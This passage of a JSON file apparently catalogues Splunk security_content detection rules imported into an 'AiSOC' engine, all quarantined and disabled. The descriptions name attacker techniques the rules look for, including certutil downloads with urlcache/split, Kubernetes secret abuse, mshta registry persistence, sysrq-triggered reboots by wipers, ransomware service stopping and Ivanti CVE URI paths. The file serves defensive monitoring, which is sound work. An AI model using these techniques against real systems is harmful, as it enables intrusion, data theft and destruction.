"T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-norun-windows-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "de81bc46-9213-11eb-adc9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_norun_windows_app.yml" } }, { "id": "splunk-security-content-ded9f9d7-edb8-48cf-8b72-1b459eee6785", "type": "detection", "name": "Cisco Smart Install Port Discovery and Status", "description": "This analytic detects network traffic to TCP port 4786, which is used by the Cisco Smart Install protocol. Smart Install is a plug-and-play configuration and image-management feature that helps customers to deploy Cisco switches. This protocol has been exploited via CVE-2018-0171, a vulnerability that allows unauthenticated remote attackers to execute arbitrary code or cause denial of service conditions. Recently, Cisco Talos reported that a Russian state-sponsored threat actor called \"Static Tundra\" has been actively exploiting this vulnerability to compromise unpatched and end-of-life network devices. Monitoring for traffic to this port can help identify potential exploitation attempts or unauthorized Smart Install activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-smart-install-port-discovery-and-status.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ded9f9d7-edb8-48cf-8b72-1b459eee6785", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_smart_install_port_discovery_and_status.yml" } }, { "id": "splunk-security-content-df275a44-4527-443b-b884-7600e066e3eb", "type": "detection", "name": "GetWmiObject Ds Group with PowerShell", "description": "The following analytic identifies the execution of `powershell.exe` with command-line arguments used to query domain groups via the `Get-WmiObject` cmdlet and the `-class ds_group` parameter.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions.\nThis activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate domain groups, which is a common step in Active Directory Discovery.\nIf confirmed malicious, this could allow attackers to gain insights into the domain structure, aiding in further attacks and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-group-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "df275a44-4527-443b-b884-7600e066e3eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_group_with_powershell.yml" } }, { "id": "splunk-security-content-df6e9cae-5257-4a34-8f3a-df49fa0f5c46", "type": "detection", "name": "Kubernetes Abuse of Secret by Unusual User Name", "description": "The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user names. It leverages Kubernetes Audit logs to identify anomalies in access patterns by analyzing the source of requests based on user names. This activity is significant for a SOC as Kubernetes Secrets store sensitive information like passwords, OAuth tokens, and SSH keys, making them critical assets. If confirmed malicious, this activity could lead to unauthorized access to sensitive systems or data, potentially resulting in significant security breaches and exfiltration of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-abuse-of-secret-by-unusual-user-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "df6e9cae-5257-4a34-8f3a-df49fa0f5c46", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_abuse_of_secret_by_unusual_user_name.yml" } }, { "id": "splunk-security-content-df74f45f-01c8-4fd6-bcb8-f6a9ea58307a", "type": "detection", "name": "Windows Cisco Secure Endpoint Related Service Stopped", "description": "The following analytic detects the suspicious termination of known services commonly targeted by ransomware before file encryption. It leverages Windows System Event Logs (EventCode 7036) to identify when critical services such as Volume Shadow Copy, backup, and antivirus services are stopped. This activity is significant because ransomware often disables these services to avoid errors and ensure successful file encryption. If confirmed malicious, this behavior could lead to widespread data encryption, rendering files inaccessible and potentially causing significant operational disruption and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cisco-secure-endpoint-related-service-stopped.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "df74f45f-01c8-4fd6-bcb8-f6a9ea58307a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cisco_secure_endpoint_related_service_stopped.yml" } }, { "id": "splunk-security-content-dfc18a5a-946e-44ee-a373-c0f60d06e676", "type": "detection", "name": "Windows SQL Spawning CertUtil", "description": "The following analytic detects the use of certutil to download software, specifically when spawned by SQL-related processes. This detection leverages Endpoint Detection and Response (EDR) data, focusing on command-line executions involving certutil with parameters like *urlcache* and *split*. This activity is significant as it may indicate a compromise by threat actors, such as Flax Typhoon, who use certutil to establish persistent VPN connections. If confirmed malicious, this behavior could allow attackers to maintain access, monitor system availability, and potentially escalate to data theft or ransomware deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-spawning-certutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "dfc18a5a-946e-44ee-a373-c0f60d06e676", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_spawning_certutil.yml" } }, { "id": "splunk-security-content-e010ddf5-e9a5-44e5-bdd6-0c919ba8fc8b", "type": "detection", "name": "ASL AWS Network Access Control List Deleted", "description": "The following analytic detects the deletion of AWS Network Access Control Lists (ACLs). It leverages AWS CloudTrail logs to identify events where a user deletes a network ACL entry. This activity is significant because deleting a network ACL can remove critical access restrictions, potentially allowing unauthorized access to cloud instances. If confirmed malicious, this action could enable attackers to bypass network security controls, leading to unauthorized access, data exfiltration, or further compromise of the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-network-access-control-list-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e010ddf5-e9a5-44e5-bdd6-0c919ba8fc8b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_network_access_control_list_deleted.yml" } }, { "id": "splunk-security-content-e02af35c-1de5-4afe-b4be-f45aba57272b", "type": "detection", "name": "GetNetTcpconnection with PowerShell", "description": "The following analytic identifies the execution of `powershell.exe` with the `Get-NetTcpConnection` command, which lists current TCP connections on a system. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. Monitoring this activity is significant as it may indicate an adversary or Red Team performing network reconnaissance or situational awareness. If confirmed malicious, this activity could allow attackers to map network connections, aiding in lateral movement or further exploitation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getnettcpconnection-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e02af35c-1de5-4afe-b4be-f45aba57272b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getnettcpconnection_with_powershell.yml" } }, { "id": "splunk-security-content-e03edeba-4942-470c-a664-27253f3ad351", "type": "detection", "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35082", "description": "The following analytic detects potential unauthorized access attempts exploiting CVE-2023-35082 within Ivanti's software products.\nIt identifies access to the specific URI path /mifs/asfV3/api/v2/ with an HTTP 200 response code in web access logs, indicating successful unauthorized access.\nThis activity is significant for a SOC as it highlights potential security breaches that could lead to unauthorized data access or system modifications.\nIf confirmed malicious, an attacker could gain unbridled access to sensitive organizational data or modify systems maliciously, posing severe security risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-epmm-remote-unauthenticated-api-access-cve-2023-35082.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e03edeba-4942-470c-a664-27253f3ad351", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35082.yml" } }, { "id": "splunk-security-content-e0422b71-2c05-4f32-8754-01fb415f49c9", "type": "detection", "name": "Executables Or Script Creation In Temp Path", "description": "The following analytic identifies the creation of executables or scripts in temporary file paths on Windows systems. It leverages the Endpoint.Filesystem data set to detect files with specific extensions (e.g., .exe, .dll, .ps1) created in temporary directories (e.g., \\windows\\Temp\\, \\AppData\\Local\\Temp\\).\nThis activity can be significant as adversaries often use these paths to evade detection and maintain persistence.\nIf confirmed malicious, this behavior could allow attackers to execute unauthorized code, escalate privileges, or persist within the environment, posing a significant security threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/executables-or-script-creation-in-temp-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0422b71-2c05-4f32-8754-01fb415f49c9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/executables_or_script_creation_in_temp_path.yml" } }, { "id": "splunk-security-content-e0428212-61b7-11ec-88a3-acde48001122", "type": "detection", "name": "Linux Service Started Or Enabled", "description": "The following analytic detects the creation or enabling of services on Linux platforms using the systemctl or service tools. It leverages Endpoint Detection and Response (EDR) logs, focusing on process names, parent processes, and command-line executions. This activity is significant as adversaries may create or modify services to maintain persistence or execute malicious payloads. If confirmed malicious, this behavior could lead to persistent access, data theft, ransomware deployment, or other damaging outcomes. Monitoring and investigating such activities are crucial for maintaining the security and integrity of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-service-started-or-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0428212-61b7-11ec-88a3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_service_started_or_enabled.yml" } }, { "id": "splunk-security-content-e08620cb-9488-4052-832d-97bcc0afd414", "type": "detection", "name": "Windows Admin Permission Discovery", "description": "The following analytic identifies the creation of a suspicious file named 'win.dat' in the root directory (C:\\). It leverages data from the Endpoint.Filesystem datamodel to detect this activity. This behavior is significant as it is commonly used by malware like NjRAT to check for administrative privileges on a compromised host. If confirmed malicious, this activity could indicate that the malware has administrative access, allowing it to perform high-privilege actions, potentially leading to further system compromise and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-admin-permission-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e08620cb-9488-4052-832d-97bcc0afd414", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_admin_permission_discovery.yml" } }, { "id": "splunk-security-content-e0940505-0b73-4719-84e6-cb94c44a5245", "type": "detection", "name": "Linux Indicator Removal Clear Cache", "description": "The following analytic detects processes that clear or free page cache on a Linux system. It leverages Endpoint Detection and Response (EDR) data, focusing on specific command-line executions involving the kernel system request `drop_caches`. This activity is significant as it may indicate an attempt to delete forensic evidence or the presence of wiper malware like Awfulshred. If confirmed malicious, this behavior could allow an attacker to cover their tracks, making it difficult to investigate other malicious activities or system compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-indicator-removal-clear-cache.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0940505-0b73-4719-84e6-cb94c44a5245", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_indicator_removal_clear_cache.yml" } }, { "id": "splunk-security-content-e09c598e-8dd0-4e73-b740-4b96b689199e", "type": "detection", "name": "Windows Modify Registry Do Not Connect To Win Update", "description": "The following analytic detects a suspicious modification to the Windows registry that disables automatic updates. It leverages data from the Endpoint datamodel, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\DoNotConnectToWindowsUpdateInternetLocations\" with a value of \"0x00000001\". This activity is significant as it can be used by adversaries, including malware like RedLine Stealer, to evade detection and prevent the system from receiving critical updates. If confirmed malicious, this could allow attackers to exploit vulnerabilities, persist in the environment, and potentially deploy additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-do-not-connect-to-win-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e09c598e-8dd0-4e73-b740-4b96b689199e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml" } }, { "id": "splunk-security-content-e0aad4cf-0790-423b-8328-7564d0d938f9", "type": "detection", "name": "SQL Injection with Long URLs", "description": "The following analytic detects long URLs containing multiple SQL commands, indicating a potential SQL injection attack. This detection leverages web traffic data, specifically targeting web server destinations with URLs longer than 1024 characters or HTTP user agents longer than 200 characters. SQL injection is significant as it allows attackers to manipulate a web application's database, potentially leading to unauthorized data access or modification. If confirmed malicious, this activity could result in data breaches, unauthorized access, and complete system compromise. Immediate investigation and validation of alerts are crucial to mitigate these risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sql-injection-with-long-urls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0aad4cf-0790-423b-8328-7564d0d938f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/sql_injection_with_long_urls.yml" } }, { "id": "splunk-security-content-e0b6ca60-9e29-4450-b51a-bba0abae2313", "type": "detection", "name": "Windows Impair Defense Deny Security Software With Applocker", "description": "The following analytic detects modifications in the Windows registry by the Applocker utility that deny the execution of various security products. This detection leverages data from the Endpoint.Registry datamodel, focusing on specific registry paths and values indicating a \"Deny\" action against known antivirus and security software. This activity is significant as it may indicate an attempt to disable security defenses, a tactic observed in malware like Azorult. If confirmed malicious, this could allow attackers to bypass security measures, facilitating further malicious activities and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-deny-security-software-with-applocker.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0b6ca60-9e29-4450-b51a-bba0abae2313", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml" } }, { "id": "splunk-security-content-e0be2c83-5526-4219-a14f-c3db2e763d15", "type": "detection", "name": "Okta IDP Lifecycle Modifications", "description": "The following analytic identifies modifications to Okta Identity Provider (IDP) lifecycle events, including creation, activation, deactivation, and deletion of IDP configurations. It uses OktaIm2 logs ingested via the Splunk Add-on for Okta Identity Cloud. Monitoring these events is crucial for maintaining the integrity and security of authentication mechanisms. Unauthorized or anomalous changes could indicate potential security breaches or misconfigurations. If confirmed malicious, attackers could manipulate authentication processes, potentially gaining unauthorized access or disrupting identity management systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-idp-lifecycle-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0be2c83-5526-4219-a14f-c3db2e763d15", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_idp_lifecycle_modifications.yml" } }, { "id": "splunk-security-content-e0eea4fa-4274-11ec-882b-3e22fbd008af", "type": "detection", "name": "Windows Service Creation on Remote Endpoint", "description": "The following analytic identifies the creation of a Windows Service on a remote endpoint using `sc.exe`. It detects this activity by analyzing process execution logs from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments that include remote paths and service creation commands. This behavior is significant because adversaries often exploit the Service Control Manager for lateral movement and remote code execution. If confirmed malicious, this activity could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-creation-on-remote-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0eea4fa-4274-11ec-882b-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_creation_on_remote_endpoint.yml" } }, { "id": "splunk-security-content-e11c3d90-5bc7-42ad-94cd-ba75db10d897", "type": "detection", "name": "Windows Defacement Modify Transcodedwallpaper File", "description": "The following analytic identifies modifications to the TranscodedWallpaper file in the wallpaper theme directory, excluding changes made by explorer.exe. This detection leverages the Endpoint.Processes and Endpoint.Filesystem data models to correlate process activity with file modifications. This activity is significant as it may indicate an adversary attempting to deface or change the desktop wallpaper of a targeted host, a tactic often used to signal compromise or deliver a message. If confirmed malicious, this could be a sign of unauthorized access and tampering, potentially leading to further system compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1491" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defacement-modify-transcodedwallpaper-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e11c3d90-5bc7-42ad-94cd-ba75db10d897", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml" } }, { "id": "splunk-security-content-e13ceade-b673-4d34-adc4-4d9c01729753", "type": "detection", "name": "Windows Mshta Execution In Registry", "description": "The following analytic detects the execution of mshta.exe via registry entries to run malicious scripts. It leverages registry activity logs to identify entries containing \"mshta,\" \"javascript,\" \"vbscript,\" or \"WScript.Shell.\" This behavior is significant as it indicates potential fileless malware, such as Kovter, which uses encoded scripts in the registry to persist and execute without files. If confirmed malicious, this activity could allow attackers to maintain persistence, execute arbitrary code, and evade traditional file-based detection methods, posing a significant threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mshta-execution-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e13ceade-b673-4d34-adc4-4d9c01729753", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mshta_execution_in_registry.yml" } }, { "id": "splunk-security-content-e14d94a3-07fb-4b47-8406-f5e37180d422", "type": "detection", "name": "Windows Debugger Tool Execution", "description": "This analysis detects the use of debugger tools within a production environment. While these tools are legitimate for file analysis and debugging, they are abused by malware like PlugX and DarkGate for malicious DLL side-loading. The hunting query aids Security Operations Centers (SOCs) in identifying potentially suspicious tool executions, particularly for non-technical users in the production network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-debugger-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e14d94a3-07fb-4b47-8406-f5e37180d422", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_debugger_tool_execution.yml" } }, { "id": "splunk-security-content-e155876a-6048-11eb-ae93-0242ac130002", "type": "detection", "name": "O365 New Federated Domain Added", "description": "The following analytic identifies the addition of a new federated domain in an Office 365 environment. This behavior is detected by analyzing Office 365 management activity logs, specifically filtering for Workload=Exchange and Operation=\"Add-FederatedDomain\". The addition of a new federated domain is significant as it may indicate unauthorized changes or potential compromises. If confirmed malicious, attackers could establish a backdoor, bypass security measures, or exfiltrate data, leading to data breaches and unauthorized access to sensitive information. Immediate investigation is required to review the details of the added domain and any concurrent suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-federated-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e155876a-6048-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_federated_domain_added.yml" } }, { "id": "splunk-security-content-e1866ce2-ca22-11eb-8e44-acde48001122", "type": "detection", "name": "PowerShell Domain Enumeration", "description": "The following analytic detects the execution of PowerShell commands used for domain enumeration, such as `get-netdomaintrust` and `get-adgroupmember`. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as it often indicates reconnaissance efforts by an attacker to map out the domain structure and identify key users and groups. If confirmed malicious, this behavior could lead to further targeted attacks, privilege escalation, and unauthorized access to sensitive information within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-domain-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1866ce2-ca22-11eb-8e44-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_domain_enumeration.yml" } }, { "id": "splunk-security-content-e1912b58-ed9c-422c-bbb0-2dbc70398345", "type": "detection", "name": "Linux System Reboot Via System Request Key", "description": "The following analytic detects the execution of the SysReq hack to reboot a Linux system host. It leverages Endpoint Detection and Response (EDR) data to identify processes executing the command to pipe 'b' to /proc/sysrq-trigger. This activity is significant as it is an uncommon method to reboot a system and was observed in the Awfulshred malware wiper. If confirmed malicious, this technique could indicate the presence of suspicious processes and potential system compromise, leading to unauthorized reboots and disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-system-reboot-via-system-request-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1912b58-ed9c-422c-bbb0-2dbc70398345", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_system_reboot_via_system_request_key.yml" } }, { "id": "splunk-security-content-e1997b2e-655f-4561-82fd-aeba8e1c1a86", "type": "detection", "name": "Suspicious SQLite3 LSQuarantine Behavior", "description": "The following analytic identifies the use of SQLite3 querying the MacOS preferences to determine the original URL from which a package was downloaded. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions involving LSQuarantine. This activity is significant as it is commonly associated with MacOS adware and other malicious software. If confirmed malicious, this behavior could indicate an attempt to track or manipulate downloaded packages, potentially leading to further system compromise or persistent adware infections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": 